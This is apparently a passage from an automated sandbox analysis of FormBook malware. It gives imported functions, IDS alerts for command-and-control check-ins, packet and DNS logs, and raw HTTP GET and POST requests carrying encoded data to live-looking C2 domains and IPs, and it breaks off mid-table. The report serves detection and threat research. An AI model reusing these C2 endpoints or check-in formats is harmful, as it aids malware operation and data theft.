ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T20:27:05.356151+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.10	49974	154.90.58.209	80	TCP
2025-01-10T20:27:22.934808+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49976	47.76.213.197	80	TCP
2025-01-10T20:27:24.879333+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49977	47.76.213.197	80	TCP
2025-01-10T20:27:27.631097+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49978	47.76.213.197	80	TCP
2025-01-10T20:27:30.033407+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.10	49979	47.76.213.197	80	TCP
2025-01-10T20:27:36.087507+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49980	74.48.143.82	80	TCP
2025-01-10T20:27:38.639796+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49981	74.48.143.82	80	TCP
2025-01-10T20:27:41.215893+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49982	74.48.143.82	80	TCP
2025-01-10T20:27:43.729058+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.10	49983	74.48.143.82	80	TCP
2025-01-10T20:27:50.294439+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49984	13.248.169.48	80	TCP
2025-01-10T20:27:51.777235+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49985	13.248.169.48	80	TCP
2025-01-10T20:27:54.325725+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49986	13.248.169.48	80	TCP
2025-01-10T20:27:56.899908+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.10	49987	13.248.169.48	80	TCP
2025-01-10T20:28:03.102177+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49988	103.21.221.87	80	TCP
2025-01-10T20:28:05.835980+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49989	103.21.221.87	80	TCP
2025-01-10T20:28:08.393691+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49990	103.21.221.87	80	TCP
2025-01-10T20:28:11.290150+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.10	49991	103.21.221.87	80	TCP
2025-01-10T20:28:19.527236+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49992	8.218.14.120	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 20:27:04.400346994 CET	49974	80	192.168.2.10	154.90.58.209
Jan 10, 2025 20:27:04.405316114 CET	80	49974	154.90.58.209	192.168.2.10
Jan 10, 2025 20:27:04.405395031 CET	49974	80	192.168.2.10	154.90.58.209
Jan 10, 2025 20:27:04.415405035 CET	49974	80	192.168.2.10	154.90.58.209
Jan 10, 2025 20:27:04.420253992 CET	80	49974	154.90.58.209	192.168.2.10
Jan 10, 2025 20:27:05.355887890 CET	80	49974	154.90.58.209	192.168.2.10
Jan 10, 2025 20:27:05.356089115 CET	80	49974	154.90.58.209	192.168.2.10
Jan 10, 2025 20:27:05.356151104 CET	49974	80	192.168.2.10	154.90.58.209
Jan 10, 2025 20:27:05.359247923 CET	49974	80	192.168.2.10	154.90.58.209
Jan 10, 2025 20:27:05.363976955 CET	80	49974	154.90.58.209	192.168.2.10
Jan 10, 2025 20:27:21.386276960 CET	49976	80	192.168.2.10	47.76.213.197
Jan 10, 2025 20:27:21.391179085 CET	80	49976	47.76.213.197	192.168.2.10
Jan 10, 2025 20:27:21.391268015 CET	49976	80	192.168.2.10	47.76.213.197
Jan 10, 2025 20:27:21.413971901 CET	49976	80	192.168.2.10	47.76.213.197
Jan 10, 2025 20:27:21.418855906 CET	80	49976	47.76.213.197	192.168.2.10
Jan 10, 2025 20:27:22.934808016 CET	49976	80	192.168.2.10	47.76.213.197
Jan 10, 2025 20:27:22.939810991 CET	80	49976	47.76.213.197	192.168.2.10
Jan 10, 2025 20:27:22.939881086 CET	49976	80	192.168.2.10	47.76.213.197
Jan 10, 2025 20:27:23.953862906 CET	49977	80	192.168.2.10	47.76.213.197
Jan 10, 2025 20:27:23.958985090 CET	80	49977	47.76.213.197	192.168.2.10
Jan 10, 2025 20:27:23.959135056 CET	49977	80	192.168.2.10	47.76.213.197
Jan 10, 2025 20:27:23.974621058 CET	49977	80	192.168.2.10	47.76.213.197
Jan 10, 2025 20:27:23.979783058 CET	80	49977	47.76.213.197	192.168.2.10
Jan 10, 2025 20:27:24.879007101 CET	80	49977	47.76.213.197	192.168.2.10
Jan 10, 2025 20:27:24.879115105 CET	80	49977	47.76.213.197	192.168.2.10
Jan 10, 2025 20:27:24.879333019 CET	49977	80	192.168.2.10	47.76.213.197
Jan 10, 2025 20:27:25.481743097 CET	49977	80	192.168.2.10	47.76.213.197
Jan 10, 2025 20:27:26.500457048 CET	49978	80	192.168.2.10	47.76.213.197
Jan 10, 2025 20:27:26.506139040 CET	80	49978	47.76.213.197	192.168.2.10
Jan 10, 2025 20:27:26.506228924 CET	49978	80	192.168.2.10	47.76.213.197
Jan 10, 2025 20:27:26.521656990 CET	49978	80	192.168.2.10	47.76.213.197
Jan 10, 2025 20:27:26.526633978 CET	80	49978	47.76.213.197	192.168.2.10
Jan 10, 2025 20:27:26.526645899 CET	80	49978	47.76.213.197	192.168.2.10
Jan 10, 2025 20:27:27.630928040 CET	80	49978	47.76.213.197	192.168.2.10
Jan 10, 2025 20:27:27.630969048 CET	80	49978	47.76.213.197	192.168.2.10
Jan 10, 2025 20:27:27.631097078 CET	49978	80	192.168.2.10	47.76.213.197
Jan 10, 2025 20:27:28.028652906 CET	49978	80	192.168.2.10	47.76.213.197
Jan 10, 2025 20:27:29.087775946 CET	49979	80	192.168.2.10	47.76.213.197
Jan 10, 2025 20:27:29.094105959 CET	80	49979	47.76.213.197	192.168.2.10
Jan 10, 2025 20:27:29.094211102 CET	49979	80	192.168.2.10	47.76.213.197
Jan 10, 2025 20:27:29.109637022 CET	49979	80	192.168.2.10	47.76.213.197
Jan 10, 2025 20:27:29.114597082 CET	80	49979	47.76.213.197	192.168.2.10
Jan 10, 2025 20:27:30.033190966 CET	80	49979	47.76.213.197	192.168.2.10
Jan 10, 2025 20:27:30.033222914 CET	80	49979	47.76.213.197	192.168.2.10
Jan 10, 2025 20:27:30.033406973 CET	49979	80	192.168.2.10	47.76.213.197
Jan 10, 2025 20:27:30.036377907 CET	49979	80	192.168.2.10	47.76.213.197
Jan 10, 2025 20:27:30.042105913 CET	80	49979	47.76.213.197	192.168.2.10
Jan 10, 2025 20:27:35.512839079 CET	49980	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:35.517807007 CET	80	49980	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:35.517904997 CET	49980	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:35.534235954 CET	49980	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:35.539077997 CET	80	49980	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:36.087412119 CET	80	49980	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:36.087450027 CET	80	49980	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:36.087490082 CET	80	49980	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:36.087507010 CET	49980	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:36.087594032 CET	49980	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:37.044244051 CET	49980	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:38.063169003 CET	49981	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:38.068067074 CET	80	49981	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:38.068190098 CET	49981	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:38.083345890 CET	49981	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:38.088224888 CET	80	49981	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:38.639672995 CET	80	49981	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:38.639697075 CET	80	49981	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:38.639714956 CET	80	49981	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:38.639796019 CET	49981	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:38.639844894 CET	49981	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:39.591106892 CET	49981	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:40.611412048 CET	49982	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:40.616389990 CET	80	49982	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:40.616497040 CET	49982	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:40.630244970 CET	49982	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:40.635077953 CET	80	49982	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:40.635251045 CET	80	49982	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:41.215569973 CET	80	49982	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:41.215641975 CET	80	49982	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:41.215893030 CET	49982	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:41.216532946 CET	80	49982	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:41.216588020 CET	49982	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:42.138294935 CET	49982	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:43.157152891 CET	49983	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:43.162174940 CET	80	49983	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:43.162281036 CET	49983	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:43.171972036 CET	49983	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:43.176776886 CET	80	49983	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:43.728873014 CET	80	49983	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:43.728897095 CET	80	49983	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:43.728914976 CET	80	49983	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:43.729058027 CET	49983	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:43.729109049 CET	49983	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:43.732115030 CET	49983	80	192.168.2.10	74.48.143.82
Jan 10, 2025 20:27:43.737011909 CET	80	49983	74.48.143.82	192.168.2.10
Jan 10, 2025 20:27:48.770117998 CET	49984	80	192.168.2.10	13.248.169.48
Jan 10, 2025 20:27:48.774879932 CET	80	49984	13.248.169.48	192.168.2.10
Jan 10, 2025 20:27:48.774947882 CET	49984	80	192.168.2.10	13.248.169.48
Jan 10, 2025 20:27:48.790218115 CET	49984	80	192.168.2.10	13.248.169.48
Jan 10, 2025 20:27:48.794951916 CET	80	49984	13.248.169.48	192.168.2.10
Jan 10, 2025 20:27:50.294439077 CET	49984	80	192.168.2.10	13.248.169.48
Jan 10, 2025 20:27:50.348510981 CET	80	49984	13.248.169.48	192.168.2.10
Jan 10, 2025 20:27:51.313359976 CET	49985	80	192.168.2.10	13.248.169.48
Jan 10, 2025 20:27:51.318207979 CET	80	49985	13.248.169.48	192.168.2.10
Jan 10, 2025 20:27:51.318396091 CET	49985	80	192.168.2.10	13.248.169.48
Jan 10, 2025 20:27:51.333789110 CET	49985	80	192.168.2.10	13.248.169.48
Jan 10, 2025 20:27:51.338704109 CET	80	49985	13.248.169.48	192.168.2.10
Jan 10, 2025 20:27:51.776446104 CET	80	49985	13.248.169.48	192.168.2.10
Jan 10, 2025 20:27:51.776576042 CET	80	49985	13.248.169.48	192.168.2.10
Jan 10, 2025 20:27:51.777235031 CET	49985	80	192.168.2.10	13.248.169.48
Jan 10, 2025 20:27:52.149866104 CET	80	49984	13.248.169.48	192.168.2.10
Jan 10, 2025 20:27:52.151356936 CET	49984	80	192.168.2.10	13.248.169.48
Jan 10, 2025 20:27:52.844149113 CET	49985	80	192.168.2.10	13.248.169.48
Jan 10, 2025 20:27:53.859641075 CET	49986	80	192.168.2.10	13.248.169.48
Jan 10, 2025 20:27:53.864758015 CET	80	49986	13.248.169.48	192.168.2.10
Jan 10, 2025 20:27:53.864852905 CET	49986	80	192.168.2.10	13.248.169.48
Jan 10, 2025 20:27:53.882965088 CET	49986	80	192.168.2.10	13.248.169.48
Jan 10, 2025 20:27:53.887897015 CET	80	49986	13.248.169.48	192.168.2.10
Jan 10, 2025 20:27:53.887995958 CET	80	49986	13.248.169.48	192.168.2.10
Jan 10, 2025 20:27:54.325609922 CET	80	49986	13.248.169.48	192.168.2.10
Jan 10, 2025 20:27:54.325670004 CET	80	49986	13.248.169.48	192.168.2.10
Jan 10, 2025 20:27:54.325725079 CET	49986	80	192.168.2.10	13.248.169.48
Jan 10, 2025 20:27:55.388261080 CET	49986	80	192.168.2.10	13.248.169.48
Jan 10, 2025 20:27:56.406836987 CET	49987	80	192.168.2.10	13.248.169.48
Jan 10, 2025 20:27:56.411652088 CET	80	49987	13.248.169.48	192.168.2.10
Jan 10, 2025 20:27:56.411727905 CET	49987	80	192.168.2.10	13.248.169.48
Jan 10, 2025 20:27:56.421020031 CET	49987	80	192.168.2.10	13.248.169.48
Jan 10, 2025 20:27:56.425793886 CET	80	49987	13.248.169.48	192.168.2.10
Jan 10, 2025 20:27:56.899673939 CET	80	49987	13.248.169.48	192.168.2.10
Jan 10, 2025 20:27:56.899777889 CET	80	49987	13.248.169.48	192.168.2.10
Jan 10, 2025 20:27:56.899908066 CET	49987	80	192.168.2.10	13.248.169.48
Jan 10, 2025 20:27:56.902596951 CET	49987	80	192.168.2.10	13.248.169.48
Jan 10, 2025 20:27:56.907433033 CET	80	49987	13.248.169.48	192.168.2.10
Jan 10, 2025 20:28:02.197439909 CET	49988	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:02.202370882 CET	80	49988	103.21.221.87	192.168.2.10
Jan 10, 2025 20:28:02.202445984 CET	49988	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:02.221708059 CET	49988	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:02.226577044 CET	80	49988	103.21.221.87	192.168.2.10
Jan 10, 2025 20:28:03.102021933 CET	80	49988	103.21.221.87	192.168.2.10
Jan 10, 2025 20:28:03.102056980 CET	80	49988	103.21.221.87	192.168.2.10
Jan 10, 2025 20:28:03.102176905 CET	49988	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:03.732374907 CET	49988	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:04.751543999 CET	49989	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:04.931277990 CET	80	49989	103.21.221.87	192.168.2.10
Jan 10, 2025 20:28:04.931416988 CET	49989	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:04.950292110 CET	49989	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:04.955188990 CET	80	49989	103.21.221.87	192.168.2.10
Jan 10, 2025 20:28:05.835823059 CET	80	49989	103.21.221.87	192.168.2.10
Jan 10, 2025 20:28:05.835854053 CET	80	49989	103.21.221.87	192.168.2.10
Jan 10, 2025 20:28:05.835979939 CET	49989	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:06.466272116 CET	49989	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:07.486690998 CET	49990	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:07.491669893 CET	80	49990	103.21.221.87	192.168.2.10
Jan 10, 2025 20:28:07.494549036 CET	49990	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:07.510123014 CET	49990	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:07.515058994 CET	80	49990	103.21.221.87	192.168.2.10
Jan 10, 2025 20:28:07.515094042 CET	80	49990	103.21.221.87	192.168.2.10
Jan 10, 2025 20:28:08.393552065 CET	80	49990	103.21.221.87	192.168.2.10
Jan 10, 2025 20:28:08.393598080 CET	80	49990	103.21.221.87	192.168.2.10
Jan 10, 2025 20:28:08.393691063 CET	49990	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:09.013071060 CET	49990	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:10.032474041 CET	49991	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:10.037729979 CET	80	49991	103.21.221.87	192.168.2.10
Jan 10, 2025 20:28:10.037807941 CET	49991	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:10.046586990 CET	49991	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:10.051474094 CET	80	49991	103.21.221.87	192.168.2.10
Jan 10, 2025 20:28:11.289968967 CET	80	49991	103.21.221.87	192.168.2.10
Jan 10, 2025 20:28:11.289998055 CET	80	49991	103.21.221.87	192.168.2.10
Jan 10, 2025 20:28:11.290019035 CET	80	49991	103.21.221.87	192.168.2.10
Jan 10, 2025 20:28:11.290047884 CET	80	49991	103.21.221.87	192.168.2.10
Jan 10, 2025 20:28:11.290149927 CET	49991	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:11.290175915 CET	49991	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:11.290182114 CET	49991	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:11.340758085 CET	49991	80	192.168.2.10	103.21.221.87
Jan 10, 2025 20:28:11.345539093 CET	80	49991	103.21.221.87	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 20:26:59.320297003 CET	50579	53	192.168.2.10	1.1.1.1
Jan 10, 2025 20:26:59.336481094 CET	53	50579	1.1.1.1	192.168.2.10
Jan 10, 2025 20:27:04.357223034 CET	54076	53	192.168.2.10	1.1.1.1
Jan 10, 2025 20:27:04.395339966 CET	53	54076	1.1.1.1	192.168.2.10
Jan 10, 2025 20:27:20.551389933 CET	63901	53	192.168.2.10	1.1.1.1
Jan 10, 2025 20:27:21.383733034 CET	53	63901	1.1.1.1	192.168.2.10
Jan 10, 2025 20:27:35.048243046 CET	56706	53	192.168.2.10	1.1.1.1
Jan 10, 2025 20:27:35.510322094 CET	53	56706	1.1.1.1	192.168.2.10
Jan 10, 2025 20:27:48.751143932 CET	64210	53	192.168.2.10	1.1.1.1
Jan 10, 2025 20:27:48.767805099 CET	53	64210	1.1.1.1	192.168.2.10
Jan 10, 2025 20:28:01.920876026 CET	50610	53	192.168.2.10	1.1.1.1
Jan 10, 2025 20:28:02.194658995 CET	53	50610	1.1.1.1	192.168.2.10
Jan 10, 2025 20:28:17.751358986 CET	65387	53	192.168.2.10	1.1.1.1
Jan 10, 2025 20:28:18.603257895 CET	53	65387	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 20:26:59.320297003 CET	192.168.2.10	1.1.1.1	0xfe32	Standard query (0)	www.grandesofertas.fun	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:27:04.357223034 CET	192.168.2.10	1.1.1.1	0xf675	Standard query (0)	www.jijievo.site	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:27:20.551389933 CET	192.168.2.10	1.1.1.1	0x27ff	Standard query (0)	www.ytsd88.top	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:27:35.048243046 CET	192.168.2.10	1.1.1.1	0x4af7	Standard query (0)	www.bpgroup.site	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:27:48.751143932 CET	192.168.2.10	1.1.1.1	0x9666	Standard query (0)	www.fortevision.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:28:01.920876026 CET	192.168.2.10	1.1.1.1	0x3c6f	Standard query (0)	www.rtpterbaruwaktu3.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:28:17.751358986 CET	192.168.2.10	1.1.1.1	0xc558	Standard query (0)	www.prhmcjdz.tokyo	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 20:26:59.336481094 CET	1.1.1.1	192.168.2.10	0xfe32	Name error (3)	www.grandesofertas.fun	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:27:04.395339966 CET	1.1.1.1	192.168.2.10	0xf675	No error (0)	www.jijievo.site	all.wjscdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 20:27:04.395339966 CET	1.1.1.1	192.168.2.10	0xf675	No error (0)	all.wjscdn.com		154.90.58.209	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:27:04.395339966 CET	1.1.1.1	192.168.2.10	0xf675	No error (0)	all.wjscdn.com		154.205.143.51	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:27:04.395339966 CET	1.1.1.1	192.168.2.10	0xf675	No error (0)	all.wjscdn.com		154.205.156.26	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:27:04.395339966 CET	1.1.1.1	192.168.2.10	0xf675	No error (0)	all.wjscdn.com		154.205.159.116	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:27:04.395339966 CET	1.1.1.1	192.168.2.10	0xf675	No error (0)	all.wjscdn.com		38.54.112.227	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:27:04.395339966 CET	1.1.1.1	192.168.2.10	0xf675	No error (0)	all.wjscdn.com		154.90.35.240	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:27:21.383733034 CET	1.1.1.1	192.168.2.10	0x27ff	No error (0)	www.ytsd88.top		47.76.213.197	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:27:35.510322094 CET	1.1.1.1	192.168.2.10	0x4af7	No error (0)	www.bpgroup.site	bpgroup.site		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 20:27:35.510322094 CET	1.1.1.1	192.168.2.10	0x4af7	No error (0)	bpgroup.site		74.48.143.82	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:27:48.767805099 CET	1.1.1.1	192.168.2.10	0x9666	No error (0)	www.fortevision.xyz		13.248.169.48	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:27:48.767805099 CET	1.1.1.1	192.168.2.10	0x9666	No error (0)	www.fortevision.xyz		76.223.54.146	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:28:02.194658995 CET	1.1.1.1	192.168.2.10	0x3c6f	No error (0)	www.rtpterbaruwaktu3.xyz	rtpterbaruwaktu3.xyz		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 20:28:02.194658995 CET	1.1.1.1	192.168.2.10	0x3c6f	No error (0)	rtpterbaruwaktu3.xyz		103.21.221.87	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:28:18.603257895 CET	1.1.1.1	192.168.2.10	0xc558	No error (0)	www.prhmcjdz.tokyo	ymx01.cn		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 20:28:18.603257895 CET	1.1.1.1	192.168.2.10	0xc558	No error (0)	ymx01.cn		8.218.14.120	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.jijievo.site

www.ytsd88.top

www.bpgroup.site

www.fortevision.xyz

www.rtpterbaruwaktu3.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49974	154.90.58.209	80	6544	C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:27:04.415405035 CET	455	OUT	GET /z9pi/?KzB47nV=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipglwHgduUeSBeuMCINCfMt0kyQ8gS8A==&ity41=G4jxKXr HTTP/1.1 Host: www.jijievo.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Jan 10, 2025 20:27:05.355887890 CET	197	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Date: Fri, 10 Jan 2025 19:27:05 GMT Server: nginx Vary: Accept-Encoding Content-Length: 24 Connection: close Data Raw: 55 6e 61 62 6c 65 20 74 6f 20 67 65 74 20 63 6f 6e 6e 65 63 74 69 6f 6e Data Ascii: Unable to get connection

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49976	47.76.213.197	80	6544	C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:27:21.413971901 CET	707	OUT	POST /8qt7/ HTTP/1.1 Host: www.ytsd88.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Origin: http://www.ytsd88.top Referer: http://www.ytsd88.top/8qt7/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 196 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Data Raw: 4b 7a 42 34 37 6e 56 3d 49 72 71 4f 51 36 78 65 37 33 49 49 6a 4a 35 47 4f 77 79 67 74 72 66 53 59 47 51 6e 2f 72 46 61 4c 37 6b 71 6b 68 42 71 63 5a 36 43 39 62 31 44 65 59 45 6d 4b 44 66 52 75 79 63 32 57 77 45 67 76 37 46 6b 65 39 6b 5a 4a 6f 75 62 4c 47 5a 69 7a 6d 30 51 6a 4c 64 68 58 58 55 33 4e 49 62 45 51 53 47 51 6b 46 5a 66 61 55 34 66 6d 45 66 64 4d 58 49 6b 4a 53 50 42 5a 41 6b 42 56 4a 2b 4a 44 6e 4f 32 2b 4e 49 67 64 79 37 47 4c 4e 5a 46 54 74 4f 6a 2b 73 39 72 51 48 57 51 6e 42 36 66 66 4f 43 65 42 58 2f 51 4b 62 33 66 79 70 48 4d 4b 43 75 50 53 2f 56 59 37 55 34 72 Data Ascii: KzB47nV=IrqOQ6xe73IIjJ5GOwygtrfSYGQn/rFaL7kqkhBqcZ6C9b1DeYEmKDfRuyc2WwEgv7Fke9kZJoubLGZizm0QjLdhXXU3NIbEQSGQkFZfaU4fmEfdMXIkJSPBZAkBVJ+JDnO2+NIgdy7GLNZFTtOj+s9rQHWQnB6ffOCeBX/QKb3fypHMKCuPS/VY7U4r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49977	47.76.213.197	80	6544	C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe

Timestamp	Bytes transferred	Direction	Data
